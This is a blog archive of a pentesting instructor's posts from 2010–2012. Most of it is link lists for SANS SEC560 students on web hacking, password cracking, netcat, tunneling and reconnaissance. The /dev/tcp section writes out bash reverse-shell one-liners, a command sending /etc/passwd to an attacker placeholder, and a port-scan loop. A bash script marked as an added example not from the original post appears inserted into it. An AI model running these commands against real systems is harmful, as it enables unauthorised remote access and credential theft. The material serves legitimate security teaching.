Sunday, August 5, 2012

Resurrection

I'm thinking of resurrecting this blog. I've been sitting on it a bit and posting elsewhere, but I think this might be an opportune time to dust it off and add some content.

So, first off, if you are looking for the patches or the slides from 'The Safety Dance: Wardriving the 4.9ghz Public Safety Band', they can be found on Github here: https://github.com/OpenSecurityResearch/public-safety

I think we're going to keep poking at it a bit as there may be a few more interesting things to find there. The nice thing about this line of research is it's something you can pull out each time you go to a new city, you never know what kind of cool networks you may find ;)

Secondly, Defcon was really a blast. I think the best part (other than speaking, which was surreal) was meeting the other speakers and having some really cool conversations about each others research. It's humbling to realize how smart some of these guys are, but the truly amazing part is how they treat you as an equal, which I suppose is even more humbling ;)

The other really awesome part was the discussions we had at the Q&A session after the talk. The guys who came to it truly love wireless, and some were wicked talented as well. To the dude who reversed the app for the RFID cards, can you ping me please? I'm trying to figure out which business card is yours and I'm terrible with names. Also, thanks to the other fellow who clued us in on some really useful 4.9ghz infos.

Anyway, check this space for more blathering shortly. With BH/DC being over and me (finally) being home for a little bit, I'm really feeling re-energized and looking forward to new research, so I'll post as much as possible.


Cheers,

RP


Thursday, August 26, 2010

Web application hacking resources

Here's some links I provided to my sec560 students this week for the web application hacking section of the course.

Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.

By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are putting together an informal group which will meet monthly in the Parsippany, NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs. All are welcome!

Cheers,

RP


Web application hacking resources


Vulnerable WebApps:

OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary

GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

MOTH - http://www.bonsai-sec.com/en/research/moth.php

Damn Vulnerable Web App - http://www.dvwa.co.uk/

Gruyere - http://google-gruyere.appspot.com/

Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10

Hackme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm

Hackme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm

Hackme Shipping - http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm

Hackme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm



Videos & webcasts:

Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx

OWASP Appsec NYC 2008 - http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference

Caught in the web series - http://www.coresecurity.com/content/ondemand-caught

Invasion of the browser snatchers series - http://www.coresecurity.com/content/on-demand-snatchers

Advanced SQL injection - http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection

Websec 101 - http://www.foundstone.com/us/websec101.asp

Hackme Bank & Hackme Travel videos - http://www.foundstone.com/us/resources-videos.asp



Tools

Samurai Web Testing Framework (Live CD which contains most tools needed to perform a web assessment) - http://samurai.inguardians.com

Google Hacking Database - http://www.hackersforcharity.org/ghdb/

Burpsuite - http://portswigger.net/suite/

W3AF - http://w3af.sourceforge.net/

Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai

Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi

Wikto - http://www.sensepost.com/labs/tools/pentest/wikto

Sqlmap - http://sqlmap.sourceforge.net/



Methodologies & references

OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf

OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack



Cheat Sheets

SQL Injection Cheat Sheet - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet

SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/

SQL Injection Cheat Sheets sorted by DB - http://pentestmonkey.net/index.php?option=com_content&task=category&sectionid=9&id=24&Itemid=1

XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html

Web App Assessment Cheat Sheet - http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf



Books:

Web Application Hackers Handbook - http://portswigger.net/wahh/

SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240

XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543

The Oracle Hackers Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20



Whitepapers & slides:

Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf

OWASP article on Web application penetration testing - http://www.owasp.org/index.php/Web_Application_Penetration_Testing

Advanced SQL injection - http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf

Best of web application penetration testing tools - http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf

(The next two papers are a little old, but still quite useful)

Advanced SQL Injection in SQL Server - http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

(More) Advanced SQL Injection in SQL Server - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf

Saturday, August 21, 2010

Password cracking resources

Here's a few links to word lists, rainbow tables & other assorted password cracking related resources I provided to my sec560 mentor class. It seems to me to be a fairly short list so I believe I may be omitting a few things. If you notice something missing, let me know & I'll add it in...

Cheers,

RP

http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPUs.

http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.

http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.

http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/

http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.

http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)

http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)

http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)

http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.

Friday, August 13, 2010

/dev/tcp contest

So, I gave my SEC560 mentor class a challenge this week: the student who finds the coolest use for /dev/tcp gets a $10 gift certificate to Starbucks (hey, I'm poor, ok?)

Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.

Good luck & remember "If you're not playing the game, the game is playing you"

Resources on netcat, /dev/tcp, tunneling, etc.

Here's a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) & as usual the conversation strayed into other ways to redirect & tunnel traffic so you'll find some resources in that regard below.

I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.

Enjoy!


Ed Skoudis - Crazy-Ass Netcat Relays for Fun & Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit

Ed Skoudis - Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/coresecurity/PenTestingNinjitsuSeries.html

Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/coresecurity/PenTestingPerfectStormSeries.html

Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/coresecurity/PerfectStormPart4.html

Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/coresecurity/InvasionoftheBrowserSnatchersSeries.html



The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf

HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.html



Netcat variants:

Ncat: http://nmap.org/ncat/

Socat: http://www.dest-unreach.org/socat/

Cryptcat: http://cryptcat.sourceforge.net/info.php

DNScat: http://tadek.pietraszek.org/projects/DNScat/



Also, here are some awesome tunneling & proxying tools


PTunnel - http://www.cs.uit.no/~daniels/PingTunnel/

Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies.


Stunnel - http://www.stunnel.org/ -

Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL.


Proxytunnel - http://proxytunnel.sourceforge.net/

Creates tunnels using HTTP and HTTPS proxies (that understand the HTTP CONNECT command). Works as a back-end driver for an OpenSSH client, and creates SSH connections through HTTP(S) proxies.

The included paper is a REALLY good read as well - http://proxytunnel.sourceforge.net/paper.php


ProxyChains - http://proxychains.sourceforge.net/

This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.



BASH connect back shell using /dev/tcp from http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html



GnuCitizen User Link

Attack Box: nc -l -p Port -vvv

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done


Neohapsis User Link

Attack Box: nc -l -p Port -vvv

Victim: $ exec 0<>/dev/tcp/IP_Address/Port # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0<&0 1>&0 2>&0



Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:

Linux

• /dev/tcp rocks!

• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port], which opens a connection with the target IPaddr on that port

• With a little command-line magic, we can use this for Netcat-like behavior


Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:

$ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]

• Catch it on the other side with a Netcat listener



Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor

/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1

• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered



Linux Command-Line Port Scanner


• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]



Storing Results and Iterating

• But, it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed

• For a port scanner, we could use a while loop that increments through port numbers

$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
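As an added example (not from Ed's slides or the original post), here is a bounded version of the /dev/tcp port check above: the bare `echo > /dev/tcp/...` one-liner returns at once on a refused port, but a port whose SYN is silently dropped stalls the loop until the kernel's own connect timeout, so this wraps the redirection in coreutils timeout(1). It assumes bash with network redirections and GNU timeout are installed; the loopback target and port list are constructed.

```shell
#!/usr/bin/env bash
# Bounded /dev/tcp port check (added example, assumes bash + coreutils timeout).

# Return 0 if host:port completes a TCP handshake within $3 seconds
# (default 2), 1 if the connection is refused, never answered, or if this
# bash was built without network redirections (/dev/tcp then fails to open).
port_open() {
  local host=$1 port=$2 wait=${3:-2}
  # The redirection runs in a child bash so timeout(1) can kill it when a
  # filtered port never answers. Host and port are passed as positional
  # arguments rather than spliced into the command string, so a stray
  # shell metacharacter in either cannot alter the command.
  timeout "$wait" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$host" "$port" 2>/dev/null
}

# Check a space-separated list of ports on one host and print the open ones
# on a single line. This mirrors the ">> /tmp/ports.txt" idea from the
# slides but writes to stdout so the caller decides where results go.
scan_ports() {
  local host=$1 ports=$2 p open=""
  for p in $ports; do
    if port_open "$host" "$p" 1; then
      open="$open $p"
    fi
  done
  # Empty output means none of the listed ports accepted a connection.
  echo "${open# }"
}

# Stand-alone usage (constructed target: loopback, a few low ports).
scan_ports 127.0.0.1 "1 7 22 80"
```

Run it against a host after a firewall change to confirm that only the expected services still accept connections; each unanswered port now costs at most the timeout rather than the kernel's retry budget.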

Thursday, July 15, 2010

A few more odds & ends

Still no time for original content, but here a few more resources I sent to my sec560 students, figured I would share them on here as well...


Sec560 week 4 resources:


Here is the free online version of Fyodor's Nmap book. Not all chapters are available, but it is still a great read - http://nmap.org/book/toc.html


Great tutorial on Scapy:

http://www.secdev.org/projects/scapy/doc/usage.html#interactive-tutorial


Also, a Python tutorial to go with it - http://docs.python.org/tutorial/



Here are two of the papers I mentioned in class:

Exploiting Tomorrow's Internet Today: Penetration Testing with IPv6 - http://www.uninformed.org/?v=10&a=3

Insertion, Evasion & Denial of Service: Eluding Network Intrusion Detection - http://insecure.org/stf/secnet_ids/secnet_ids.html



These are some of the blogs I read (or more accurately, try to find time to read)

http://www.darkoperator.com/ - Carlos Perez

http://blog.metasploit.com/ - HD Moore, Egypt & others

http://taosecurity.blogspot.com/ - Richard Bejtlich

http://www.packetstan.com/ - Judy Novak, Mike Poor, Josh Wright

http://pauldotcom.com/ - Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Mick Douglas

http://blog.commandlinekungfu.com/ - Ed Skoudis, Hal Pomeranz, Tim Medin

http://carnal0wnage.attackresearch.com/ - Chris Gates, Valsmith & others

http://vrt-sourcefire.blogspot.com/ - Sourcefire Vulnerability Research Team

http://theharmonyguy.com/ - Joey Tyson

http://blog.harmonysecurity.com/ - Stephen Fewer

http://isc.sans.edu/index.html - SANS Internet Storm Center

Tuesday, July 13, 2010

The end of procrastination (maybe)

I've been trying to get around to start posting on here for a while now, but can never quite come up with what I want to post.

So, I figure I'll just start off with some resources I've been sharing with the students of my sec560 mentor class.

Enjoy & I promise some original content soon (maybe) lol



Resources for sec560 week2:


First off a few Penetration Testing methodologies:


OSSTMM (Open Source Security Testing Methodology Manual) - http://www.isecom.org/osstmm/

Penetration Testing Framework - http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html (Super detailed)

OWASP Testing Guide (focused on web application testing) - http://www.owasp.org/index.php/Category:OWASP_Testing_Project

NIST Guide to Security Testing - http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf


Also, here is a great reference for computer crime related laws: http://www.cybercrime.gov/cclaws.html

One final item, here are a bunch of infosec related 'cheat sheets'; the SANS ones pertaining to this course are at the bottom - http://zeltser.com/cheat-sheets/



Resources for sec560 week 3:


Reconnaissance tools & scripts:

Metagoofil: http://www.edge-security.com/metagoofil.php

Metagoofil is an information gathering tool designed for extracting metadata from public documents (pdf, doc, xls, ppt, odp, ods) available on the target/victim websites.


The Harvester: http://www.edge-security.com/theHarvester.php

theHarvester is a tool for gathering e-mail accounts, user names and hostnames/subdomains from different public sources. It's a really simple tool, but very effective.


Subdomainer: http://www.edge-security.com/subdomainer.php

Subdomainer is an information gathering tool designed for obtaining subdomain names from public sources, like Google, MSN search, Yahoo, PGP servers, etc.


gpscan: http://www.digininja.org/projects/gpscan.php

Scans Google Profiles for personnel from a target organization


CeWL: http://www.digininja.org/projects/cewl.php

Custom wordlist generator, scrapes a site & generates a list of words useful for password guessing.


Reconnoiter: http://www.jwnetworkconsulting.com/security/web-application-security/new-open-source-project-created-reconnoiter

Generates possible user names by scraping LinkedIn for the names of employees of the target organization



Recommended talks & presentations:

New School Information Gathering - Chris Gates

Audio: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.mp3

Slides: http://www.chicagocon.com/images/stories/library/media_lab/2008s/ChicagoCon2008s_CGates_NewSchoolInfoGathering.pdf


Tactical Exploitation - HD Moore & Valsmith:

Video (part 1): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V35-Moore-Valsmith-Tactical_Exploitation-PT1.mp4

Video (part 2): http://avondale.good.net/dl/bd/blackhat-2007-usa-video/2007_BlackHat_Vegas-V36-Moore-Valsmith-Tactical_Exploitation-PT2.mp4

Whitepaper v1: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf

Whitepaper v2: http://blog.attackresearch.com/publications/hdmoore_valsmith_tactical_paper.pdf